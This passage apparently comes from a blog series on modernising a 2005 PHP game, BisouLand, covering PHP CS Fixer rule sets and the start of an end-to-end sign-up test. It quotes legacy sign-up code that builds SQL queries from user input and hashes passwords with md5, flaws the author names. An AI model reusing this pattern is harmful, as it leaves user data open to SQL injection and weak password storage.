3) ../monolith/web/checkConnect.php (binary_operator_spaces, no_whitespace_in_blank_line)
4) ../monolith/web/phpincludes/fctIndex.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
5) ../monolith/web/phpincludes/topten.php (binary_operator_spaces, no_whitespace_in_blank_line)
6) ../monolith/web/phpincludes/pages.php (blank_line_after_opening_tag)
7) ../monolith/web/deconnexion.php (blank_line_after_opening_tag, binary_operator_spaces)
8) ../monolith/web/news/rediger_news.php (no_whitespace_in_blank_line)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/phpincludes/evo.php (binary_operator_spaces, no_whitespace_in_blank_line)
11) ../monolith/web/phpincludes/stats.php (binary_operator_spaces, no_whitespace_in_blank_line)
12) ../monolith/web/phpincludes/infos.php (binary_operator_spaces)
13) ../monolith/web/phpincludes/cerveau.php (binary_operator_spaces, no_whitespace_in_blank_line)
14) ../monolith/web/phpincludes/yeux.php (binary_operator_spaces, no_whitespace_in_blank_line)
15) ../monolith/web/phpincludes/inscription.php (binary_operator_spaces, no_whitespace_in_blank_line)
16) ../monolith/web/phpincludes/faq.php (binary_operator_spaces, no_whitespace_in_blank_line)
17) ../monolith/web/phpincludes/construction.php (binary_operator_spaces)
18) ../monolith/web/phpincludes/recherche.php (binary_operator_spaces)
19) ../monolith/web/makeBan.php (binary_operator_spaces, no_whitespace_in_blank_line)
20) ../monolith/web/index.php (binary_operator_spaces, no_whitespace_in_blank_line)
21) ../monolith/web/phpincludes/livreor.php (binary_operator_spaces, no_whitespace_in_blank_line)
22) ../monolith/web/phpincludes/bisous.php (binary_operator_spaces, no_whitespace_in_blank_line)
23) ../monolith/web/phpincludes/boite.php (indentation_type, binary_operator_spaces, no_whitespace_in_blank_line)
24) ../monolith/web/phpincludes/connected.php (indentation_type, binary_operator_spaces, no_whitespace_in_blank_line)
25) ../monolith/web/phpincludes/envoi.php (binary_operator_spaces, no_whitespace_in_blank_line)
26) ../monolith/web/phpincludes/action.php (binary_operator_spaces, no_whitespace_in_blank_line)
27) ../monolith/web/phpincludes/accueil.php (binary_operator_spaces, no_whitespace_in_blank_line)
28) ../monolith/web/phpincludes/lire.php (binary_operator_spaces, no_whitespace_in_blank_line)
29) ../monolith/web/phpincludes/membres.php (binary_operator_spaces)
30) ../monolith/web/phpincludes/nuage.php (binary_operator_spaces, no_whitespace_in_blank_line)
31) ../monolith/web/phpincludes/attaque.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
32) ../monolith/web/phpincludes/confirmation.php (binary_operator_spaces, no_whitespace_in_blank_line)
33) ../monolith/web/phpincludes/changepass.php (binary_operator_spaces, no_whitespace_in_blank_line)
34) ../monolith/web/phpincludes/techno.php (binary_operator_spaces)
35) ../monolith/web/phpincludes/newpass.php (binary_operator_spaces, no_whitespace_in_blank_line)
Found 35 of 43 files that can be fixed in 0.207 seconds, 18.00 MB memory used
So far so good, let's apply the changes: make cs-fix.
But we are not finished here, it's time to introduce risky rules: these are rules that once applied can potentially change the logic and behaviour of your code.
For example the rule no_unreachable_default_argument_value, will remove default values for arguments, that come before other arguments without default values.
Here's the new configuration:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR12' => true,
'@PSR12:risky' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Running make cs-check will show that all is fine,
so we apply the change through make cs-fix,
and then we have a look at the changes made,
and test around to make sure nothing is broken.
Next is the PER CS 2.0 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PER-CS2x0' => true,
'@PER-CS2x0:risky' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
As the PHP language evolves it gets new features, which then requires the coding standards PSRs to be updated.
However the PSRs process where not suitable for updates, so PER (PHP Evolving Recommendation) was created.
PER CS 1.0, released in 2022, is intentionally strictly equivalent to PSR-12.
In 2023, PER CS 2.0 was released, to cover PHP 8 new features, such as:
Because it is targeted at new PHP versions, some of its rule won't be compatible with our version of PHP (5.6):
In PHP 5.6, trailing commas are only supported with arrays, so we need to change our configuration slightly:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PER-CS2x0' => true,
'@PER-CS2x0:risky' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
// [PER-CS2.0] Partially disabled due to PHP version constraints.
'trailing_comma_in_multiline' => [
'after_heredoc' => true,
'elements' => [
// 'arguments', For PHP 7.3+
// 'array_destructuring', For PHP 7.1+
'arrays',
// 'match', For PHP 8.0+
// 'parameters', For PHP 8.0+
],
],
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
If we run the checks:
> make cs-check
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (concat_space, binary_operator_spaces)
2) ../monolith/web/redirect.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
3) ../monolith/web/checkConnect.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
4) ../monolith/web/phpincludes/fctIndex.php (array_syntax, array_indentation, blank_line_after_opening_tag, concat_space, trailing_comma_in_multiline, binary_operator_spaces,no_whitespace_in_blank_line)
5) ../monolith/web/phpincludes/topten.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
6) ../monolith/web/phpincludes/pages.php (array_syntax, blank_line_after_opening_tag, trailing_comma_in_multiline)
7) ../monolith/web/deconnexion.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces)
8) ../monolith/web/news/rediger_news.php (no_whitespace_in_blank_line)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/news/liste_news.php (concat_space)
11) ../monolith/web/phpincludes/evo.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
12) ../monolith/web/phpincludes/stats.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
13) ../monolith/web/phpincludes/infos.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces)
14) ../monolith/web/phpincludes/cerveau.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
15) ../monolith/web/phpincludes/yeux.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
16) ../monolith/web/phpincludes/inscription.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
17) ../monolith/web/phpincludes/faq.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
18) ../monolith/web/phpincludes/construction.php (concat_space, binary_operator_spaces)
19) ../monolith/web/phpincludes/recherche.php (concat_space, binary_operator_spaces)
20) ../monolith/web/phpincludes/bd.php (concat_space)
21) ../monolith/web/makeBan.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
22) ../monolith/web/index.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
23) ../monolith/web/phpincludes/livreor.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
24) ../monolith/web/phpincludes/bisous.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
25) ../monolith/web/phpincludes/boite.php (indentation_type, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
26) ../monolith/web/phpincludes/connected.php (indentation_type, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
27) ../monolith/web/phpincludes/envoi.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
28) ../monolith/web/phpincludes/action.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
29) ../monolith/web/phpincludes/accueil.php (array_syntax, array_indentation, binary_operator_spaces, no_whitespace_in_blank_line)
30) ../monolith/web/phpincludes/lire.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
31) ../monolith/web/phpincludes/membres.php (concat_space, binary_operator_spaces)
32) ../monolith/web/phpincludes/nuage.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
33) ../monolith/web/phpincludes/attaque.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
34) ../monolith/web/phpincludes/confirmation.php (array_syntax, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
35) ../monolith/web/phpincludes/changepass.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
36) ../monolith/web/phpincludes/techno.php (concat_space, binary_operator_spaces)
37) ../monolith/web/phpincludes/newpass.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
Found 37 of 43 files that can be fixed in 0.210 seconds, 16.00 MB memory used
Once again, no issues there, so we can apply the fixes: make-cs fix.
Time for the final boss, the Coding Standards used in the Symfony project.
See Symfony ruleset here, and Symfony:risky ruleset there.
Those are by no means meant to be used in Symfony projects (or any projects), it's just what the Symfony developers use internally to build the framework.
But these 41 rules provide:
use statements) organisation and formattingThe 34 risky rules also add performance optimisations (e.g. native function invocation with leading backslash to by pass autoloading lookup).
So let's adopt them here:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@Symfony' => true,
'@Symfony:risky' => true,
// —— Overriden rules ——————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
// [PER-CS2.0] Partially disabled due to PHP version constraints.
'trailing_comma_in_multiline' => [
'after_heredoc' => true,
'elements' => [
// 'arguments', For PHP 7.3+
// 'array_destructuring', For PHP 7.1+
'arrays',
// 'match', For PHP 8.0+
// 'parameters', For PHP 8.0+
],
],
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Let's run the checks:
> make cs-check
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (concat_space, no_extra_blank_lines)
2) ../monolith/web/redirect.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
3) ../monolith/web/checkConnect.php (increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
4) ../monolith/web/phpincludes/fctIndex.php (single_space_around_construct, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines, blank_line_before_statement)
5) ../monolith/web/phpincludes/topten.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
6) ../monolith/web/phpincludes/pages.php (single_quote, single_line_comment_spacing)
7) ../monolith/web/deconnexion.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
8) ../monolith/web/news/rediger_news.php (concat_space, no_extra_blank_lines)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/news/liste_news.php (single_line_comment_spacing, concat_space, yoda_style, logical_operators, no_extra_blank_lines)
11) ../monolith/web/reductionNuages.php (single_line_comment_spacing)
12) ../monolith/web/phpincludes/evo.php (increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines, blank_line_before_statement)
13) ../monolith/web/phpincludes/stats.php (single_space_around_construct, single_quote, semicolon_after_instruction, concat_space, space_after_semicolon)
14) ../monolith/web/phpincludes/infos.php (increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon)
15) ../monolith/web/phpincludes/cerveau.php (single_space_around_construct, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
16) ../monolith/web/phpincludes/yeux.php (no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
17) ../monolith/web/phpincludes/inscription.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
18) ../monolith/web/phpincludes/faq.php (single_quote, single_line_comment_spacing, concat_space, no_extra_blank_lines)
19) ../monolith/web/phpincludes/construction.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
20) ../monolith/web/phpincludes/recherche.php (single_quote, concat_space, yoda_style)
21) ../monolith/web/phpincludes/bd.php (concat_space)
22) ../monolith/web/phpincludes/accueil.php (single_quote, whitespace_after_comma_in_array, yoda_style, space_after_semicolon, no_extra_blank_lines)
23) ../monolith/web/phpincludes/lire.php (single_space_around_construct, single_quote, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
24) ../monolith/web/phpincludes/membres.php (modernize_types_casting, no_unneeded_control_parentheses, increment_style, single_quote, concat_space, no_singleline_whitespace_before_semicolons, yoda_style, no_extra_blank_lines, binary_operator_spaces)
25) ../monolith/web/phpincludes/nuage.php (single_space_around_construct, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
26) ../monolith/web/phpincludes/attaque.php (no_empty_statement, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
27) ../monolith/web/phpincludes/confirmation.php (no_unneeded_control_parentheses, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
28) ../monolith/web/phpincludes/changepass.php (single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon)
29) ../monolith/web/phpincludes/techno.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
30) ../monolith/web/phpincludes/newpass.php (single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
31) ../monolith/web/makeBan.php (increment_style, single_quote, single_line_comment_spacing, concat_space, space_after_semicolon)
32) ../monolith/web/index.php (single_space_around_construct, increment_style, single_quote, no_spaces_after_function_name, single_line_comment_spacing, concat_space, include,no_singleline_whitespace_before_semicolons, yoda_style, space_after_semicolon, no_extra_blank_lines)
33) ../monolith/web/phpincludes/livreor.php (modernize_types_casting, no_unneeded_control_parentheses, increment_style, single_quote, semicolon_after_instruction, single_line_comment_spacing, native_constant_invocation, concat_space, no_singleline_whitespace_before_semicolons, yoda_style, no_extra_blank_lines, binary_operator_spaces)
34) ../monolith/web/phpincludes/bisous.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
35) ../monolith/web/phpincludes/connexion.php (yoda_style, no_extra_blank_lines)
36) ../monolith/web/phpincludes/boite.php (indentation_type, single_space_around_construct, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
37) ../monolith/web/phpincludes/connected.php (indentation_type, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
38) ../monolith/web/phpincludes/envoi.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
39) ../monolith/web/phpincludes/action.php (no_unneeded_braces, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines, no_whitespace_in_blank_line)
Found 39 of 43 files that can be fixed in 0.212 seconds, 16.00 MB memory used
All safe it'd seem, let's apply those then: make cs-fix
By progressively applying PHP CS Fixer rule sets, we've transformed BisouLand's chaotic 2005 code into something that follows modern standards.
The key insight here is incrementalism, we didn't jump straight to the strictest rule set, but instead built up gradually:
Along the way we:
statement_indentation breaks mixed HTML/PHP files)The final configuration gives us automated formatting that makes the code more readable and maintainable, without breaking functionality.
Now, before we move on, here's a super secret PHP CS Fixer tip:
you can run php-cs-fixer describe <rule/ruleset>,
which serves as a local documentation:
> docker compose exec app php vendor/bin/php-cs-fixer describe trailing_comma_in_multiline
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Description of the `trailing_comma_in_multiline` rule.
Arguments lists, array destructuring lists, arrays that are multi-line, `match`-lines and parameters lists must have a trailing comma.
Fixer is configurable using following options:
* after_heredoc (bool): whether a trailing comma should also be placed after heredoc end; defaults to false
* elements (a subset of ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']): where to fix multiline trailing comma (PHP >= 8.0 for `parameters` and `match`); defaults to ['arrays']
Fixing examples:
* Example #1. Fixing with the default configuration.
---------- begin diff ----------
--- Original
+++ New
@@ -1,5 +1,5 @@
<?php
array(
1,
- 2
+ 2,
);
----------- end diff -----------
* Example #2. Fixing with configuration: ['after_heredoc' => true].
---------- begin diff ----------
--- Original
+++ New
@@ -1,7 +1,7 @@
<?php
$x = [
'foo',
<<<EOD
bar
- EOD
+ EOD,
];
----------- end diff -----------
* Example #3. Fixing with configuration: ['elements' => ['arguments']].
---------- begin diff ----------
--- Original
+++ New
@@ -1,5 +1,5 @@
<?php
foo(
1,
- 2
+ 2,
);
----------- end diff -----------
* Example #4. Fixing with configuration: ['elements' => ['parameters']].
---------- begin diff ----------
--- Original
+++ New
@@ -1,7 +1,7 @@
<?php
function foo(
$x,
- $y
+ $y,
)
{
}
----------- end diff -----------
The fixer is part of the following rule sets:
* @PER *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS2.0 *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS2x0 with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS3.0 *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS3x0 with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PHP73Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP74Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP7x3Migration with config: ['after_heredoc' => true]
* @PHP7x4Migration with config: ['after_heredoc' => true]
* @PHP80Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP81Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP82Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP83Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP84Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP85Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP8x0Migration with config: ['after_heredoc' => true]
* @PHP8x1Migration with config: ['after_heredoc' => true]
* @PHP8x2Migration with config: ['after_heredoc' => true]
* @PHP8x3Migration with config: ['after_heredoc' => true]
* @PHP8x4Migration with config: ['after_heredoc' => true]
* @PHP8x5Migration with config: ['after_heredoc' => true]
* @PhpCsFixer with config: ['after_heredoc' => true, 'elements' => ['array_destructuring', 'arrays']]
* @Symfony with config: ['after_heredoc' => true, 'elements' => ['array_destructuring', 'arrays', 'match', 'parameters']]
]]>⁉️ Hold on, what about those SQL injection vulnerabilities?
🤘 The Beta Destroyer breaks free from the crypts of Manual Testing, forging unbreakable chains of End to End test scenarios, binding every component in the unholy covenant of automations! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But currently the tests are failing!
So, we'll inspect the issue, identify it, write End to End tests which will be today's third article focus, and finally we'll fix the bug.

Let's run the tests to see the failure messages:
make test arg='--testdox --filter PlayerPages'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
FFFFFFFFFFFF............ 24 / 24 (100%)
Time: 00:00.081, Memory: 18.00 MB
Player Pages (Bl\Qa\Tests\Smoke\PlayerPages)
✘ it loads account page (`/connected.html`) for logged in players
┐
├ Failed asserting that Page loads for logged in players
│
│ /apps/qa/tests/Smoke/Assertion/Assert.php:41
│ /apps/qa/tests/Smoke/PlayerPagesTest.php:45
┴
[...]
FAILURES!
Tests: 24, Assertions: 24, Failures: 12.
The player cannot log in... Let's try manually, first we need to sign-up a new player:

It worked:

Now let's log in:

But it fails! The error says the username doesn't exist:

Inspecting the database shows that the player data wasn't inserted.
The Smoke Tests didn't catch directly the login error,
because it's an error printed inside the HTML,
and our tests only check for status code 200.
So this highlights the limits of Smoke Tests (though we have to recognise that they did indirectly catch the issue, with players being unable to login).
The code handling signing up is located in ./apps/monolith/web/phpincludes/inscription.php,
and hold on to your socks because it looks like this:
<?php
if (false == $_SESSION['logged']) {
$send = 0;
$pseudo = '';
$mdp = '';
if (isset($_POST['inscription'])) {
// Mesure de securite.
$pseudo = htmlentities(addslashes($_POST['Ipseudo']));
$mdp = htmlentities(addslashes($_POST['Imdp']));
$mdp2 = htmlentities(addslashes($_POST['Imdp2']));
// Prevoir empecher de prendre un pseudo deje existant
// Si les variables contenant le pseudo, le mot de passe existent et contiennent quelque chose.
if (isset($_POST['Ipseudo'], $_POST['Imdp'], $_POST['Imdp2']) && !empty($_POST['Ipseudo']) && !empty($_POST['Imdp']) && !empty($_POST['Imdp2'])) {
if ($mdp == $mdp2) {
// Si le pseudo est superieur e 3 caracteres et inferieur e 35 caracteres.
$taille = strlen(trim($_POST['Ipseudo']));
if ($taille >= 4 && $taille <= 15) {
/* //Mesure de securite.
$pseudo = htmlentities(addslashes($_POST['pseudo']));
$mdp = htmlentities(addslashes($_POST['mdp']));*/
// La requete qui compte le nombre de pseudos
$sql = mysql_query("SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo='".$pseudo."'");
// Verifie si le pseudo n'est pas deje pris.
if (0 == mysql_result($sql, 0, 'nb_pseudo') && 'BisouLand' != $pseudo) {
// Verifie que le pseudo est correct.
if (preg_match("!^\w+$!", $pseudo)) {
if (preg_match("!^\w+$!", $mdp)) {
// Si le mot de passe est superieur e 4 caracteres.
$taille = strlen(trim($_POST['Imdp']));
if ($taille >= 5 && $taille <= 15) {
// On execute la requete qui enregistre un nouveau membre.
// Hashage du mot de passe avec md5().
$hmdp = md5($mdp);
mysql_query("INSERT INTO membres (id, pseudo, mdp, confirmation, lastconnect) VALUES ('', '".$pseudo."', '".$hmdp."', '1', ".time().')');
echo 'Ton inscription est confirmée ! Tu peux maintenant te connecter.<br />';
$send = 1;
} else {
echo 'Erreur : le mot de passe est soit trop court, soit trop long !';
}
} else {
echo 'Erreur : le mot de passe n\'est pas valide !';
}
} else {
echo 'Erreur : le pseudo n\'est pas valide !';
}
} else {
echo 'Erreur : pseudo deje pris !';
}
} else {
echo 'Erreur : le pseudo est soit trop court, soit trop long !';
}
} else {
echo 'Erreur : Tu n\'as pas rentre deux fois le meme mot de passe !';
}
} else {
echo 'Erreur : Pense e remplir tous les champs !';
}
}
if (0 == $send) {
?>
<form method="post" class="formul" action="inscription.html">
<label>Pseudo :<br /><span class="petit">(Entre 4 et 15 caracteres)</span><br /><input type="text" name="Ipseudo" tabindex="10" size="15" maxlength="15" value="<?php echo stripslashes($pseudo); ?>"/></label><br />
<label>Mot de passe : <br /><span class="petit">(Entre 5 et 15 caracteres)</span><br /><input type="password" name="Imdp" tabindex="20" size="15" maxlength="15" value=""/></label><br />
<label>Reecris le mot de passe : <br /><input type="password" name="Imdp2" tabindex="30" size="15" maxlength="15" value=""/></label><br />
<input type="submit" name="inscription" value="S'inscrire" />
</form>
<?php
}
} else {
echo 'Pfiou t\'es dja connected toi !!';
}
?>
Now, that's eXtreme Legacy!!!
Let's focus on the problematic line, which is supposed to save the player's data in the database (I've reformatted it a bit for readability):
mysql_query(
'INSERT INTO membres (id, pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('', '{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
There are many problems here (deprecated function, SQL injection vulnerability,
use of cryptologically broken md5 for password hashing etc),
but what jumps to my attention is the use of '' for the ID value.
After some research it turns out this code worked fine in older MySQL versions,
because MySQL would silently convert the empty string to 0,
and since the id field is an AUTO_INCREMENT integer,
MySQL would then treat that 0 as a signal to generate the next sequence value.
However MySQL 5.7 (which is the version we picked!), released in October 2015,
introduced a significant change: STRICT_TRANS_TABLES became enabled by default.
This means MySQL now rejects data type error like this one.
So to fix the issue we can change the MySQL version, but the end goal is to upgrade the versions to the most recent, not to downgrade, so let's instead just fix the code.
But first, we need to write a test: Test Driven Development, or no tests at all! 🤘
There are two kinds of tests that I hate: Smoke Tests, and End to End Tests.
End to End tests usually are about navigating the application, which is slow, and checking for the content of the response, which is brittle.
However in this scenario, there are no alternative to test the features: there are no HTTP framework, or handler / controller / services classes used to allow us to write Functional / Integration / System tests.
To test our sign-up, all we can do is:
So let's just do that:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\EndToEnd;
use Bl\Qa\Tests\EndToEnd\Assertion\Assert;
use Bl\Qa\Tests\Infrastructure\Scenario\SignUpNewPlayer;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Large;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
#[CoversNothing]
#[Large]
final class SignUpTest extends TestCase
{
public function test_it_allows_visitors_to_become_players(): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$player = SignUpNewPlayer::run(
'BisouTest',
'password',
'password',
);
Assert::signedUpCount($player->username, 1);
}
#[DataProvider('invalidCredentialsProvider')]
#[TestDox('It prevents invalid credentials: $description')]
public function test_it_prevents_invalid_credentials(string $username, string $password, string $description): void
{
SignUpNewPlayer::run(
$username,
$password,
$password,
);
Assert::signedUpCount($username, 0);
}
/**
* [string $username, string $password, string $description][].
*
* @return array<array{string, string, string}>
*/
public static function invalidCredentialsProvider(): array
{
return [
['usr', 'password', 'username too short (< 4 characters)'],
['test_sign_up02__', 'password', 'username too long (> 15 characters)'],
['test_sign_up03!', 'password', 'username contains special characters (non alpha-numerical, not an underscore (`_`))'],
['test_sign_up05', 'pass', 'password too short (< 5 characters)'],
['test_sign_up06', 'passwordthatistoolong', 'password too long (> 15 characters)'],
['test_sign_up07', 'password!', 'password contains special characters (non alpha-numerical, not an underscore (`_`))'],
['BisouLand', 'password', 'system account, for notifications'],
];
}
#[TestDox('It prevents usernames that are already used')]
public function test_it_prevents_usernames_that_are_already_used(): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$username = 'BisouTest_';
$password = 'password';
$passwordConfirmation = $password;
// First registration should succeed
SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation,
);
// Second registration should fail
SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation,
);
Assert::signedUpCount($username, 1);
}
public function test_it_prevents_passwords_that_do_not_match_confirmation(): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$username = 'BisouTest';
$password = 'password';
$passwordConfirmation = 'different';
